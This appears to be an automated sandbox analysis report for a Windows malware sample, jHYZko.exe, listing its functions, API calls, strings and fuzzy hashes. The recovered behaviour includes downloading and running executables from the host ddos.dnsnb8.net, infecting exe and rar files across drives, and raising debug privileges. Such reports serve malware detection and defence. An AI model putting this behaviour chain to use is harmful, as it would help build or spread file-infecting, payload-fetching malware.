SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00E6174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00E6177C
__aulldiv.LIBCMT ref: 00E61796
__aulldiv.LIBCMT ref: 00E617A8

Strings

C:\Users\user\AppData\Local\Temp\jHYZko.exe, xrefs: 00E61722
SOFTWARE\GTplus, xrefs: 00E61742, 00E6176B
Time, xrefs: 00E6173D, 00E61766

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\jHYZko.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-809457920
Opcode ID: 672003f325ac7c3ab446ac1e60a15eb371401cd9fb71b29a2df3cf6ecafb0f05
Instruction ID: 3226136de9649f3d1b3bcc092a3a20f3f02f594df5c3327cf53ffb4c58d8d468
Opcode Fuzzy Hash: 672003f325ac7c3ab446ac1e60a15eb371401cd9fb71b29a2df3cf6ecafb0f05
Instruction Fuzzy Hash: 4211B975A80209BFDB119BA4EC85FFF7BBCEB01B94F109155F900B6140D7B09B448760

Function 00E66076 Relevance: 11.1, APIs: 7, Instructions: 618
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00E660BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00E660DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00E66189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00E661A5

Memory Dump Source

Source File: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 349471f2a949da949aa5bc8eba18811362fdec757e69655e6c87d840fd64c1c1
Instruction ID: e06b7e04f18fc61772ac8c4696e3d2f7258380d52f66ad5b393e6472afd9da8b
Opcode Fuzzy Hash: 349471f2a949da949aa5bc8eba18811362fdec757e69655e6c87d840fd64c1c1
Instruction Fuzzy Hash: 781267B15987848FDB328F24DC55BEA3FB0FF12354F1815ADD88AAB2A3D674A900C751

Function 00E62B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00E62BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00E62BB4
GetDriveTypeA.KERNEL32(?), ref: 00E62BD3
CreateThread.KERNEL32(00000000,00000000,00E62B7D,?,00000000,00000000), ref: 00E62BEE
lstrlen.KERNEL32(?), ref: 00E62BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00E62C16
CreateThread.KERNEL32(00000000,00000000,00E62845,00000000,00000000,00000000), ref: 00E62C3A

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: 2f361d957e9318370c6a27a63a9c956d3a9a92d7a12e6b3f4664c25767015ed7
Instruction ID: 3b9755006c39d8f749b4deabbe7d0ee3696db6ef71ddcdd084cfc6c34d1b6495
Opcode Fuzzy Hash: 2f361d957e9318370c6a27a63a9c956d3a9a92d7a12e6b3f4664c25767015ed7
Instruction Fuzzy Hash: 5C21D5B198065CAFE7209F65BC84DAF7B6DFB053C8B141129FA42B2151D7618D0ECF61

Function 00E61E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,00E632B0,00000164,00E62986,?), ref: 00E61EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00E61ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00E61EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00E61F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00E61F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00E6201E
memset.MSVCRT ref: 00E620D8
memset.MSVCRT ref: 00E620EA
memcpy.MSVCRT ref: 00E6222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E62238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E6224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E622C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E622CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E622DD
WriteFile.KERNEL32(000000FF,00E64008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E622F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E6230D
FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E62322
UnmapViewOfFile.KERNEL32(?,?,00E632B0,00000164,00E62986,?), ref: 00E62340
FindCloseChangeNotification.KERNEL32(?,?,00E632B0,00000164,00E62986,?), ref: 00E6234E
CloseHandle.KERNEL32(000000FF,?,00E632B0,00000164,00E62986,?), ref: 00E62359

Strings

m@, xrefs: 00E61E8F, 00E6225A
5@, xrefs: 00E62282
.@, xrefs: 00E62274
<@, xrefs: 00E62290
C@, xrefs: 00E6229E

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
String ID: .@$5@$<@$C@$m@
API String ID: 3349749541-519767493
Opcode ID: d26c098e803e7ece1a4ce2e7a682276fb857847bf961b11d43c5fc5a192dc92c
Instruction ID: ff1b3084269da71dc5a2489492cf1ad86331fa2b46fdeb6139170e5b1de2ad07
Opcode Fuzzy Hash: d26c098e803e7ece1a4ce2e7a682276fb857847bf961b11d43c5fc5a192dc92c
Instruction Fuzzy Hash: BAF16A70980609EFCB25DFA4EC80AADBBB5FF08394F109569E609B76A1D730AD45CF50

Function 00E61973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(\N,00000000,C:\Users\user\AppData\Local\Temp\jHYZko.exe), ref: 00E61992
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00E619BA
Sleep.KERNEL32(00000064), ref: 00E619C6
wsprintfA.USER32 ref: 00E619EC
CopyFileA.KERNEL32(?,?,00000000), ref: 00E61A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E61A1E
GetFileSize.KERNEL32(?,00000000), ref: 00E61A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00E61A46
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E61A65
FindCloseChangeNotification.KERNEL32(000000FF), ref: 00E61A90
DeleteFileA.KERNEL32(?), ref: 00E61AA7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E61AC1

Strings

C:\Users\user\AppData\Local\Temp\jHYZko.exe, xrefs: 00E6197C
%s%.8X.data, xrefs: 00E619E6
C:\Users\user\AppData\Local\Temp\, xrefs: 00E619DB
\N, xrefs: 00E61980

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\jHYZko.exe$\N
API String ID: 2523042076-1649785553
Opcode ID: c6324214c5610a4057a63c603f0e838318a55384345db738b0d02f89dffb5423
Instruction ID: 4020746156f4bf18533b1cedcfc5f7b49affe4a277251eaf1986a65ffd3d2fe1
Opcode Fuzzy Hash: c6324214c5610a4057a63c603f0e838318a55384345db738b0d02f89dffb5423
Instruction Fuzzy Hash: C3518E71D41219EFCB119FE9EC84AAEBBB8FB05398F1855A9F515F2190C3708E44CB50

Function 00E628B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00E628D3
wsprintfA.USER32 ref: 00E628F7
memset.MSVCRT ref: 00E62925
wsprintfA.USER32 ref: 00E62940

Part of subcall function 00E629E2: memset.MSVCRT ref: 00E62A02
Part of subcall function 00E629E2: wsprintfA.USER32 ref: 00E62A1A
Part of subcall function 00E629E2: memset.MSVCRT ref: 00E62A44
Part of subcall function 00E629E2: lstrlen.KERNEL32(?), ref: 00E62A54
Part of subcall function 00E629E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00E62A6C
Part of subcall function 00E629E2: strrchr.MSVCRT ref: 00E62A7C
Part of subcall function 00E629E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00E62A9F
Part of subcall function 00E629E2: lstrlen.KERNEL32(Documents and Settings), ref: 00E62AAE
Part of subcall function 00E629E2: memset.MSVCRT ref: 00E62AC6
Part of subcall function 00E629E2: memset.MSVCRT ref: 00E62ADA
Part of subcall function 00E629E2: FindFirstFileA.KERNEL32(?,?), ref: 00E62AEF
Part of subcall function 00E629E2: memset.MSVCRT ref: 00E62B13

strrchr.MSVCRT ref: 00E62959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00E62974

Strings

%s\, xrefs: 00E6293A
rar, xrefs: 00E62988
%s%s, xrefs: 00E628F1
C:\Users\user\AppData\Local\Temp\, xrefs: 00E629B3
exe, xrefs: 00E6296D

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-898104377
Opcode ID: e42814b04b87444f0fe0b30faa924fa911cbf8619e182018c83bbd100ab77518
Instruction ID: e89f1e9e15af861090f836307b23d35bb68fb86cd7a6633633f2ea3ff0fd7e3a
Opcode Fuzzy Hash: e42814b04b87444f0fe0b30faa924fa911cbf8619e182018c83bbd100ab77518
Instruction Fuzzy Hash: 8531C77198070D7BDB219775FC85FCA77AC9F903D4F04185AF645B2181E6B4DAC88BA0

Function 00E61099 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E6185B: GetSystemTimeAsFileTime.KERNEL32(00E61F92,00000000,?,00000000,?,?,?,00E61F92,?,00000000,00000002), ref: 00E61867
Part of subcall function 00E6185B: srand.MSVCRT ref: 00E61878
Part of subcall function 00E6185B: rand.MSVCRT ref: 00E61880
Part of subcall function 00E6185B: srand.MSVCRT ref: 00E61890
Part of subcall function 00E6185B: rand.MSVCRT ref: 00E61894

WinExec.KERNEL32(?,00000005), ref: 00E610F1
lstrlen.KERNEL32(00E64748), ref: 00E610FA
wsprintfA.USER32 ref: 00E6112A
wsprintfA.USER32 ref: 00E61143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00E6115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00E61169
Sleep.KERNEL32 ref: 00E61179

Strings

%s%.8X.exe, xrefs: 00E61124
cj/, xrefs: 00E61135
http://%s:%d/%s/%s, xrefs: 00E610C2, 00E61141
C:\Users\user\AppData\Local\Temp\, xrefs: 00E61119
HG, xrefs: 00E6112C
ddos.dnsnb8.net, xrefs: 00E610C8, 00E610CF, 00E61140, 00E61168

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-3330010840
Opcode ID: 6a24a233ba5479727e3ca2bae50979118bf3fb49d0e4f4e46f31b970b099138b
Instruction ID: 24fd39b752246f5a966ab2079214f41f62d63cf734c85c62e6e39f87d451bf35
Opcode Fuzzy Hash: 6a24a233ba5479727e3ca2bae50979118bf3fb49d0e4f4e46f31b970b099138b
Instruction Fuzzy Hash: CE2191B5981248BEDB21DBA1FC49BAFBBBCAB02395F155095E100B2051D7B45F888F60

Function 00E61638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00E6164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00E6165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\jHYZko.exe,00000104), ref: 00E6166E
CreateThread.KERNEL32(00000000,00000000,00E61099,00000000,00000000,00000000), ref: 00E616AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00E616BD

Part of subcall function 00E6139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\jHYZko.exe), ref: 00E613BC
Part of subcall function 00E6139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00E613DA
Part of subcall function 00E6139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00E61448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\jHYZko.exe), ref: 00E616E5

Strings

C:\Users\user\AppData\Local\Temp\jHYZko.exe, xrefs: 00E61662, 00E61667, 00E616DD
C:\Users\user\AppData\Local\Temp\, xrefs: 00E61644
C:\Windows\system32, xrefs: 00E61656
Documents and Settings, xrefs: 00E61696

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\jHYZko.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-3023818835
Opcode ID: 0f8ecdfd781f9afb2dab656bf0aad2b412ad2e5925d5a6c6339022434cc576bb
Instruction ID: fbde47895ee413c6cefbdbee513cace2dea17e127d231566230d1b4ed7b0316d
Opcode Fuzzy Hash: 0f8ecdfd781f9afb2dab656bf0aad2b412ad2e5925d5a6c6339022434cc576bb
Instruction Fuzzy Hash: C511B4B19802147FDB6257B2FD4EE9B3E6DEB423E1F082051F209B10E0D6B0454CC7A1

Function 00E61000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG,http://%s:%d/%s/%s,00E610E8,?), ref: 00E61018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75A78400), ref: 00E61029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00E61038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 00E6104B
UnmapViewOfFile.KERNEL32(00000000), ref: 00E61075
CloseHandle.KERNEL32(?), ref: 00E6108B
CloseHandle.KERNEL32(00000000), ref: 00E6108E

Strings

http://%s:%d/%s/%s, xrefs: 00E61000
HG, xrefs: 00E61001
ddos.dnsnb8.net, xrefs: 00E61026

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: HG$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-862939041
Opcode ID: d27d4c9d1c4a57b97b1573542abf9cdd591251c47a96f05678ea9f4ebcaeb571
Instruction ID: 8f8c155f49fa9c151c76106ca9ae5787f14acba944d75d642a0525c6c7a4ebb8
Opcode Fuzzy Hash: d27d4c9d1c4a57b97b1573542abf9cdd591251c47a96f05678ea9f4ebcaeb571
Instruction Fuzzy Hash: 9D01847154035DBFE7715F71AC88E2BBBACDB447EDF044629F245B2091D6B05E488B60

Function 00E62C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00E62C57

Part of subcall function 00E61973: PathFileExistsA.SHLWAPI(\N,00000000,C:\Users\user\AppData\Local\Temp\jHYZko.exe), ref: 00E61992
Part of subcall function 00E61973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00E619BA
Part of subcall function 00E61973: Sleep.KERNEL32(00000064), ref: 00E619C6
Part of subcall function 00E61973: wsprintfA.USER32 ref: 00E619EC
Part of subcall function 00E61973: CopyFileA.KERNEL32(?,?,00000000), ref: 00E61A00
Part of subcall function 00E61973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E61A1E
Part of subcall function 00E61973: GetFileSize.KERNEL32(?,00000000), ref: 00E61A2C
Part of subcall function 00E61973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00E61A46
Part of subcall function 00E61973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E61A65

CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00E62C99
WaitForMultipleObjects.KERNEL32(00000001,00E616BA,00000001,000000FF,?,00E616BA,00000000), ref: 00E62CAC
VirtualFree.KERNEL32(00FF0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\jHYZko.exe,00E64E5C,00E64E60,?,00E616BA,00000000), ref: 00E62CC2

Strings

C:\Users\user\AppData\Local\Temp\jHYZko.exe, xrefs: 00E62C69

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\jHYZko.exe
API String ID: 2042498389-2937809834
Opcode ID: 89b9da001965ab41ac5db4110670a3aa2b6278a8da713ecc507bd139a5c9f610
Instruction ID: a9a1a74c005a2426c271847c1e18aea556e33e9484ccfacbdd2a2e0d1cfa437d
Opcode Fuzzy Hash: 89b9da001965ab41ac5db4110670a3aa2b6278a8da713ecc507bd139a5c9f610
Instruction Fuzzy Hash: C70171B17812207ED61497A5BC1AE9B7E9CEF41BE0F105114F605BA1C1D5A19908C7A0

Function 00E614E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00E61504
VirtualQuery.KERNEL32(00E614E1,?,0000001C), ref: 00E61525
ExitProcess.KERNEL32 ref: 00E6157A

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 41cacdb609dbd183182792e07c61429b236ace731ba26c04e448b3733ed826ac
Instruction ID: a2b2230c6e8454ad2b1f654d3c6b1ef82d915939e44c9dbd3fc923bed554690f
Opcode Fuzzy Hash: 41cacdb609dbd183182792e07c61429b236ace731ba26c04e448b3733ed826ac
Instruction Fuzzy Hash: F11182B1D81204DFCB12DFA6B88567EB7BCEBC47E4B14606AF403F2190D2B08949DB90

Function 00E61915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00E61933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 00E61947

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: 55f3201c90c93c6cbf138c04dc3740c735ec00c37acfba28fe691fab15de83cf
Instruction ID: 9a4719ac0a5ba6b3c41a31bdb0d717fe9287995a1720e37be7f69ca461b47239
Opcode Fuzzy Hash: 55f3201c90c93c6cbf138c04dc3740c735ec00c37acfba28fe691fab15de83cf
Instruction Fuzzy Hash: 24F04432240609ABDB219E26EC04AE777ACAB903E5F04957AF516E1090E770D649DBA0

Function 00E66159 Relevance: 2.6, APIs: 2, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00E660DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00E66189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00E661A5

Memory Dump Source

Source File: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: 242632b66b9a45353187d44472f958243d19d4e79e551592d5c88abe3b32b6c4
Instruction ID: 53587531016f127375cc21ab932ac2c0df9b7e56e021134efa673eb1fa1db7dc
Opcode Fuzzy Hash: 242632b66b9a45353187d44472f958243d19d4e79e551592d5c88abe3b32b6c4
Instruction Fuzzy Hash: A8119A32A50648CFCF318F58DC913ED37A2FF45344F690428DE8EAB2A1DA712A40CB94

Non-executed Functions

Function 00E6119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\jHYZko.exe,?,?,?,?,?,?,00E613EF), ref: 00E611AB
OpenProcessToken.ADVAPI32(00000000,00000028,00E613EF,?,?,?,?,?,?,00E613EF), ref: 00E611BB
